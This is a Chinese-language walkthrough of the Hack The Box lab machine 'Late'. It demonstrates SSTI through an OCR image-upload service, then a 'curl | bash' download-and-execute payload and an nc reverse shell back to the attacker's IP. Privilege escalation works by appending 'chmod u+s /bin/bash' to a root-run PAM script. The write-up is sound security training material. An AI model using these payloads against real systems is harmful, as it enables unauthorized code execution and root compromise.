Hackthebox - Late

靶场信息

靶场类型

信息收集

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.156
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-23 21:42 EDT
Nmap scan report for 10.10.11.156
Host is up (0.36s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Aggressive OS guesses: Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 3.10 (92%), Linux 5.3 - 5.4 (92%), Linux 2.6.32 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   385.69 ms 10.10.14.1
2   385.83 ms 10.10.11.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.86 seconds

Http

这似乎是一个图像编辑器的网站,到处看看有没有什么线索

在这里找到一个链接

http://images.late.htb/

我们去加入一个 hosts

echo 10.10.11.156 late.htb images.late.htb >> /etc/hosts

然后再访问一下

这里似乎是上传图片,然后会扫描图片,先随便传一个试试看

我将上面这张纯黑色的图片上传上去提交以后,给了我一个文件 results.txt

<p></p>

我不太理解是做了什么,之后去搜索了一下

https://www.geeksforgeeks.org/python-convert-image-to-text-and-then-to-speech/

似乎意思是会把图片里的文字使用OCR识别,然后输出出来,上传一张带文字的图片试试

去上传一下

<p>This is the first line of
this text example.

This is the second line
of the same text.
</p>

果然如此,去尝试一下上传一些恶意文件试试

<p>whoami
</p>

我上传了一张带有 whoami 的图片,识别出来后没有执行,咱们试试把 标签给闭环试试

<p></p>whoami<p>
</p>

闭环失败,重新构造一下其他语句

我们尝试一下 SSTI

<p>S81
</p>

得到了正确答案

漏洞利用

那尝试构造一下是否可以执行命令

${{request.application._ _globals_ _._ _builtins_ _._ _import_ _("os").popen("whoami").read()}}
<p>$svc_acc

</p>

执行成功,这个 OCR 识别的条件非常苛刻,我尝试了很多很多字体,总算成了一个

想办法来做一个反弹 Shell 的 payload

首先我们生成我们要的图片

${{request.application.__globals__.__builtins__.__import__("os").popen("curl http://10.10.14.9/payload | bash").read()}}

接着在桌面创建一个 payload 文件,内容为

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.9 4444 >/tmp/f

接着咱们需要开两个命令窗口

Command 1

python3 -m http.server 80

Command 2

nc -nvlp 4444

然后上传我们的 Payload

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444                                       
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.156] 58240
bash: cannot set terminal process group (1213): Inappropriate ioctl for device
bash: no job control in this shell
svc_acc@late:~/app$ whoami&&id
whoami&&id
svc_acc
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)

成功拿到一个 user 权限的 shell

svc_acc@late:~$ cat user.txt
cat user.txt
af80a52c1f6ce51724a56a589a96ce20

成功拿到一个 user 权限的 flag 文件

权限提升

首先运行一下 pspy

https://github.com/DominicBreuker/pspy

这里找到了一个定时任务脚本

/usr/local/sbin/ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

这是脚本的内容,咱们分析一下

svc_acc@late:~$ ls -la /usr/local/sbin/ssh-alert.sh
-rwxr-xr-x 1 svc_acc svc_acc 433 Apr 24 07:16 /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ lsattr /usr/local/sbin/ssh-alert.sh
-----a--------e--- /usr/local/sbin/ssh-alert.sh

这里查看权限,咱们是可以将内容写到进去的

echo "chmod u+s /bin/bash" >> /usr/local/sbin/ssh-alert.sh

咱们加一个 bash SUID,然后重新登录 ssh,接着执行提权命令

svc_acc@late:~$ echo "chmod u+s /bin/bash" >> /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ exit
logout
Connection to 10.10.11.156 closed.

┌──(root💀kali)-[~/Desktop]
└─# ssh svc_acc@10.10.11.156 -i id_rsa
-bash-4.4$ id
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
-bash-4.4$ bash -p
bash-4.4# id
uid=1000(svc_acc) gid=1000(svc_acc) euid=0(root) groups=1000(svc_acc)

成功拿到 root 权限

bash-4.4# cat /root/root.txt 
7af076bfa316a1091b3139a231ac7d1e

成功拿到 root 权限的 flag 文件